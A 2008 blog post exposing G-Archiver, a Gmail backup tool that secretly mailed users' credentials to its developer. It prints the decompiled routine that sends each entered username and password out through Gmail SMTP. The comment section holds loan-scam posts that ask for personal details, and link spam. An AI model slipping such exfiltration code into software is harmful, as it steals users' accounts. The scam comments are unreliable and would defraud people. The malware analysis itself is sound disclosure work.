Saturday, March 8, 2008

A Gmail Passwords Theft Story

No talk about technologies. Not this time. Now, a little course on programming ethics using a real life experience.

I was roaming the web, together with Mrs. Insomnia, early in the morning when I read a story of programming horror. It was talking about a malicious software application that stole Gmail accounts. You can found it in this Coding Horror blog post. Having nothing better to do I decided to verify the story and see for myself what was going on.

To begin with, there was this guy with the codename "John Terry" (John Terry is actually a football player, Chelsea's skipper and Chelsea is not only Hillary Clinton's daughter but also a football club in England), who developed an application called G-Archiver. This application can be found on popular software hosting sites like brothersoft.com. Anyway, what this terrific application does, is to back up your Gmail account to a local drive. Of course at some time you have to enter your Gmail account details, aka the username and the password. Well, the troubles begin here, because it seems that the developer has hardcoded into the application, a routine that sends the Gmail account details of the users to his own! So, every time a user enters his information, an e-mail is sent to the wise-guy, of course with a copy of the account information. If he is not a malicious password thief, this guy must be a mail spam mazochist.

Fortunately, a programmer who used the software, reverse-engineered G-Archiver (written in .NET). I can imagine his surprise when he found out what was going on. The Gmail account details of the malicious developer were there and he used them to login into his account. The picture shows exactly this. There were about 2000 e-mails waiting for him, that were all stolen Gmail usernames and passwords from other users. Now there is a name Pawel Lesnikowski at the developer's contacts. If you Google search for the name, you will jump onto a site with .NET libraries and applications. Remember the name for later (see Update #2 at end of post)

Now we should make our own investigation and take it a little further. For the fun and to verify the story, I downloaded and installed G-Archiver. The application uses two libraries: Mail.dll and SM.dll both written for .NET. I opened them with Reflector and first checked out the Mail.dll library, which is a mail lib from lesnikowski.com. From a quick search I couldn't find anything suspicious in this assembly and seems like a helper library. Maybe our guy just used this library for his purpose. And maybe our wise-guy sent a mail to Lesnikowski and that's why he appeared in his contacts. (see Update #2)

Now to the creepy clue when I slice-opened the SM.dll assembly there was in front of me a function called CheckConnection(). What is its cause? For sure it does not check for the user connection. You probably have guessed right! It sends the users' account details of course! On the right it is the function disassembled by Reflector. Just a parenthesis: These guys were so amateurs that didn't even use an obfuscator to cover up their trails. Anyway, if you cannot view it well here is the code:

MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
//Message body contains username and password....
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword
: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
//Enter the wise-guys account details...
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "*******");
client.Port = 0x24b;

client.Host = "smtp.gmail.com";
client.EnableSsl = true;
//...and send the mail
client.Send(message);

And the user's Gmail credentials are stolen with high priority! As you can see, I have hidden the guy's gmail account password, not to protect him, but to protect his users, the ones that trusted his application. After all, there are thousands of Gmail accounts inside and most of them might be still active. Now there is a company associated with the software called MateMedia Inc. And also the sad story is that if you Google search for "gmail backup" the software site (garchiver.com) appears in the second page of the results! Too bad..

As the Coding Horror's writer correctly points out, these kinds of incidents hurt the trust of people with professional application developers. However, developers also discovered and exposed this fraud. It is a race in which all developers participate. Ad infinitum or while(true)..

Update #1: As I heard the company posted on their site that this piece of code was for testing and it was not removed, as it had to, for release. :) Yeah, right..

Update #2: As I wrote in the initial post, there was nothing suspicious in the Lesnikowski mail library and that the G-Arhiver developer possibly used it and at some point wrote an e-mail to him. It turns out that this actually happened, after I received an e-mail from Pawel Lesnikowski stating in addition that they abused his work without acquiring a license and that they contacted him having questions about his Mail.dll library. I therefore feel obliged to make some minor changes to the original post. His work can be found at lesnikowski.com site.

413 comments:

«Oldest   ‹Older   401 – 413 of 413
Anonymous said...

Hі to every bodу, it's my first pay a visit of this weblog; this web site includes remarkable and genuinely good information in support of readers.

Review my site ... reputation management

Anonymous said...

Hey would you mind letting
me know which hosting company you're using? I've
loaded your blog in 3 completely different internet browsers
and I must say this blog loads a lot faster then most.

Can you suggest a good internet
hosting provider at a fair
price? Thanks, I
appreciate it!

Feel free to visit my webpage - 電車男 ()

Anonymous said...

When it comes to high school, and instead offered the option for
users to use older Snow Leopard installation disc for fleshlight any Mac that you are upgrading.
The orthodox Marxian call fleshlight for violent revolution was also one of the
reasons, if you're thinking of getting a valid driving license.

Anonymous said...

I'm not sure why but this weblog is loading incredibly slow for me. Is anyone else having this issue or is it a problem on my end? I'll check back later on and see if the problem still exists.


Feel free to visit my web page - garage rubber mats

Anonymous said...

The political landscape changed strained to sit out a few games. [url=http://www.chaplainsconnect.org/2012/12/06/holding-on-by-a-thread/#comment-15600]Visit Website[/url] Recommended Site Let's take a look at possible course-ups between Liverpool extensively, reviewing Surveillance footage from the day of the alleged fire. http://www.coburndesign.com/2012/03/06/talk-tech-topics-tips-and-tea-at-two/#comment-3681

Anonymous said...

Jodhрur pants arе wіԁеr at thе thighѕ and еnԁ up looκing fаke.
With thе right materiаls аnd a little bit better, anԁ send them off to Noгdstrοm's seeking a pair or two. Men'ѕ shorts, also knoωn aѕ Australiа fashion weeκ.

Favоrs aгe lіttle items that serve аs thank gіfts to the guests.



my web ѕite: thoi trang cong so

Anonymous said...

Microsоft executіves said the company's decision to make a proper use of this majestic device you need to do, just go to the stores. In the meantime, there are tons of other enemies. It's
a tablеt PC аnd e-booκ reader, music playeг, movіe playег, web bгoωser and email
experience. Hoωeveг, 7-inсh tablеts have done ωell in the marκet still Ipad
contraсt deals аre much more chеaper than the ipad.

Anonymous said...

Good day!
We are the financial helpers, we give out loan to the individual and outsider in a low rate at 2% interest rate, this company is a new company founded this year and also is been establish by the catholic church, which is cathedral Catholic church of all nation, we are God fearing lending company, all we do is to make a sure that our costumers are satisfied before we can benefit anything, we will stay with you until you finally get the loan from our company, we work 24hr 7 day a week, we are fast and reliable, we give out loan on a easy way, so if you are interested to get a loan from our company kindly get back to us now with this following information so that we can process the loan and send it down to you with any of this transferring process you may choose, here is our company direct email address:(backubaloanfem@hotmail.com) email us now so that we can proceed with your loan transfer to you so that you can go solve your financial problem with it.

BORROWER INFORMATION

1) First Name:
2) Last Name:
3) City/Zip Code:
4) State:
5) Country:
6) Gender:
7) Date of birth (yyyy-mm-dd):
8) Amount Needed:
9) Purpose For Loan:
10) Duration:
11) Telephone:
12) Office phone:
13) Fax:
14) Name Of Company:
15) Occupation:
16) Monthly income:

Email: catholic.backubaloanfem@hotmail.com

If you are really a good and God fearing man or woman and you know that you can obtain a loan from us then fill out thin information and return it back to us now so that we can proceed with your loan request from our company immediately

Best Regards
James mack

Richard Gumsley said...

Thank you for this valuable information, I hope it is okay that I bookmarked your website for further references.
maricarda.com

Pengertian Etika Bisnis said...

excellent post, very informative. I ponder why the other experts of this sector do
not realize this. You should proceed your writing.
I'm sure, you have a huge readers' base already!

Kate Rome said...

free essays
essay examples
sample college essays

Nelly Smith said...

DO YOU NEED AN AFFORDABLE LOAN TODAY?

We have provided over $1 Billion in business loans to over 15,000 business owners just like you.
We use our own designated risk technology to provide you with the right business loan so you can grow your business. Our services are fast and reliable, loans are approved
within 24 hours of successful application. We offer loans from a minimum range
of $5,000 to a maximum of $500 million.

Do you find yourself in a bit of
trouble with unpaid bills and don’t know which way to go or where to turn?
What about finding a reputable Debt Consolidation firm that can assist you in
reducing monthly installment so that you will have affordable repayment options
as well as room to breathe when it comes to the end of the month and bills need
to get paid? Mrs. Allison Peterson Loan Home is the answer. Reduce your payments to
ease the strain on your monthly expenses. Email
(allisonpeterson59@gmail.com)

Premium Boarding School said...

I just want to say that all the information you have given here is awesome...great and nice blog thanks sharing..Thank you very much for this one.
And i hope this will be useful for many people.. and i am waiting for your next post keep on updating these kinds of knowledgeable things.

«Oldest ‹Older   401 – 413 of 413   Newer› Newest»